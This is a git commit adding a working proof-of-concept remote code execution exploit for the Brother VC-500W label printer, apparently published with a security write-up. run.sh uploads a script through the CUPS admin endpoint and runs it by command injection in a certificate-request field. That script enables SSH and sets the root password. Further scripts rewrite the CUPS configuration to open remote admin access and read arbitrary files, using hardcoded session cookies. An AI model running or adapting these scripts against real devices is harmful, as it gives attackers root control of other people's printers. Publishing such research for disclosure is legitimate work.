+ Initial commit

2024-07-02 19:07:41 +02:00 · 2024-07-02 19:07:41 +02:00 · 28afbc81ca
commit 28afbc81ca
6 changed files with 45 additions and 0 deletions
--- a/README.md
+++ b/README.md
@ -0,0 +1,10 @@
+# Zink Wedge / Brother VC-500W RCE PoC (and other cool scripts)
+
+Usage: `./run.sh <ip_of_your_printer>`. The printer has to have finished the
+initial setup, but otherwise it should work w/o any prep.
+
+This script enables sshd, and sets the password for the root user (`meow`).
+`drop.sh` will be uploaded and run as-is on the printer, so you can modify
+that to add your custom stuff in :)
+
+More info: https://sdomi.pl/weblog/20-pwning-a-labelmaker/
--- a/drop.sh
+++ b/drop.sh
@ -0,0 +1,6 @@
+#!/bin/sh
+echo nyaa > /dev/kmsg
+mv /etc/init.d/_S50sshd /etc/init.d/S50sshd # enable the service
+sed -r -i 's@! -f /etc/ssh_host(_[rd]sa)*_key@@' /etc/init.d/S50sshd # disable most host keys; generation is SLOOOW
+echo -e 'meow\nmeow' | passwd
+/etc/init.d/S50sshd start
--- a/run.sh
+++ b/run.sh
@ -0,0 +1,13 @@
+#!/bin/bash
+if [[ ! $1 ]]; then
+	echo "usage: $0 <ip>"
+	exit 1
+fi
+ip=$1
+
+# we drop an intermediate script to make our life easier :3
+curl -X PUT "http://${ip}:631/admin/conf/drop.sh" -T drop.sh
+
+# ... and we execute it with `sh`
+# note: we have to call sh directly, as this doesn't have +x
+curl 'http://'"$ip"'/cgi-bin/certmgr/generate_request?C=meow&ST=meow&L=meow&O=meow&OU=meow&CN="$(sh${IFS}/etc/cups/drop.sh)"&emailAddress=&Generate=Generate'
--- a/tools/exp.sh
+++ b/tools/exp.sh
@ -0,0 +1,6 @@
+#!/bin/bash
+curl 'http://192.168.247.17:631/admin/' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://192.168.247.17:631' -H 'Connection: keep-alive' -H 'Referer: http://192.168.247.17:631/admin/' -H 'Cookie: org.cups.sid=1862ff74a0c01dd0fb444934e7e67e05' -H 'Upgrade-Insecure-Requests: 1' -H 'Priority: u=1' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' --data-raw 'org.cups.sid=1862ff74a0c01dd0fb444934e7e67e05&OP=config-server&CUPSDCONF=LogLevel+debug%0D%0ASystemGroup+root%0D%0AGroup+3003%0D%0AServerAlias+*%0D%0A%23+Allow+remote+access%0D%0APort+631%0D%0AListen+%2Fvar%2Frun%2Fcups%2Fcups.sock%0D%0ABrowsing+On%0D%0ABrowseOrder+allow%2Cdeny%0D%0ABrowseAllow+all%0D%0ABrowseLocalProtocols+all%0D%0ABrowseWebIF+No%0D%0AMaxJobs+8%0D%0AMaxClients+5%0D%0AMaxLogSize+5000000%0D%0APreserveJobFiles+No%0D%0APreserveJobHistory+Yes%0D%0ADefaultAuthType+Basic%0D%0ADefaultEncryption+Required%0D%0AWebInterface+Yes%0D%0APageLog+%2F'"$1"'%0D%0A%3CLocation+%2F%3E%0D%0A++%23+Allow+remote+administration...%0D%0A++Order+allow%2Cdeny%0D%0A++Allow+all%0D%0A%3C%2FLocation%3E%0D%0A%3CLocation+%2Fadmin%3E%0D%0A++%23+Allow+remote+administration...%0D%0A++Order+allow%2Cdeny%0D%0A++Allow+all%0D%0A%3C%2FLocation%3E%0D%0A%3CLocation+%2Fadmin%2Fconf%3E%0D%0A++%23+Allow+remote+access+to+the+configuration+files...%0D%0A++Order+allow%2Cdeny%0D%0A++Allow+all%0D%0A%3C%2FLocation%3E%0D%0A%3CPolicy+default%3E%0D%0A++JobPrivateAccess+default%0D%0A++JobPrivateValues+default%0D%0A++SubscriptionPrivateAccess+default%0D%0A++SubscriptionPrivateValues+default%0D%0A++%3CLimit+All%3E%0D%0A++++Order+allow%2Cdeny%0D%0A++++Allow+all%0D%0A++%3C%2FLimit%3E%0D%0A%3C%2FPolicy%3E%0D%0A%3CPolicy+authenticated%3E%0D%0A++JobPrivateAccess+default%0D%0A++JobPrivateValues+default%0D%0A++SubscriptionPrivateAccess+default%0D%0A++SubscriptionPrivateValues+default%0D%0A++%3CLimit+All%3E%0D%0A++++Order+allow%2Cdeny%0D%0A++++Allow+all%0D%0A++%3C%2FLimit%3E%0D%0A%3C%2FPolicy%3E%0D%0A&SAVECHANGES=Save+Changes' >/dev/null
+
+until curl -s http://192.168.247.17:631/admin/log/page_log; do
+	:
+done
--- a/tools/exp_err.sh
+++ b/tools/exp_err.sh
@ -0,0 +1,6 @@
+#!/bin/bash
+curl 'http://192.168.247.17:631/admin/' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://192.168.247.17:631' -H 'Connection: keep-alive' -H 'Referer: http://192.168.247.17:631/admin/' -H 'Cookie: org.cups.sid=1862ff74a0c01dd0fb444934e7e67e05' -H 'Upgrade-Insecure-Requests: 1' -H 'Priority: u=1' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' --data-raw 'org.cups.sid=1862ff74a0c01dd0fb444934e7e67e05&OP=config-server&CUPSDCONF=LogLevel+debug%0D%0ASystemGroup+root%0D%0AGroup+3003%0D%0AServerAlias+*%0D%0A%23+Allow+remote+access%0D%0APort+631%0D%0AListen+%2Fvar%2Frun%2Fcups%2Fcups.sock%0D%0ABrowsing+On%0D%0ABrowseOrder+allow%2Cdeny%0D%0ABrowseAllow+all%0D%0ABrowseLocalProtocols+all%0D%0ABrowseWebIF+No%0D%0AMaxJobs+8%0D%0AMaxClients+5%0D%0AMaxLogSize+5000000%0D%0APreserveJobFiles+No%0D%0APreserveJobHistory+Yes%0D%0ADefaultAuthType+Basic%0D%0ADefaultEncryption+Required%0D%0AWebInterface+Yes%0D%0AMaxLogSize+32768%0D%0AErrorLog+%2F'"$1"'%0D%0A%3CLocation+%2F%3E%0D%0A++%23+Allow+remote+administration...%0D%0A++Order+allow%2Cdeny%0D%0A++Allow+all%0D%0A%3C%2FLocation%3E%0D%0A%3CLocation+%2Fadmin%3E%0D%0A++%23+Allow+remote+administration...%0D%0A++Order+allow%2Cdeny%0D%0A++Allow+all%0D%0A%3C%2FLocation%3E%0D%0A%3CLocation+%2Fadmin%2Fconf%3E%0D%0A++%23+Allow+remote+access+to+the+configuration+files...%0D%0A++Order+allow%2Cdeny%0D%0A++Allow+all%0D%0A%3C%2FLocation%3E%0D%0A%3CPolicy+default%3E%0D%0A++JobPrivateAccess+default%0D%0A++JobPrivateValues+default%0D%0A++SubscriptionPrivateAccess+default%0D%0A++SubscriptionPrivateValues+default%0D%0A++%3CLimit+All%3E%0D%0A++++Order+allow%2Cdeny%0D%0A++++Allow+all%0D%0A++%3C%2FLimit%3E%0D%0A%3C%2FPolicy%3E%0D%0A%3CPolicy+authenticated%3E%0D%0A++JobPrivateAccess+default%0D%0A++JobPrivateValues+default%0D%0A++SubscriptionPrivateAccess+default%0D%0A++SubscriptionPrivateValues+default%0D%0A++%3CLimit+All%3E%0D%0A++++Order+allow%2Cdeny%0D%0A++++Allow+all%0D%0A++%3C%2FLimit%3E%0D%0A%3C%2FPolicy%3E%0D%0A&SAVECHANGES=Save+Changes' >/dev/null
+
+#until curl -s http://192.168.247.17:631/admin/log/page_log; do
+#	:
+#done
--- a/tools/generic.sh
+++ b/tools/generic.sh
@ -0,0 +1,4 @@
+#!/bin/bash
+
+curl -H "Cookie: org.cups.sid=1862ff74a0c01dd0fb444934e7e67e05; Brother_VC500W_EWS_Pass=h4d+T4+t" \
+	$@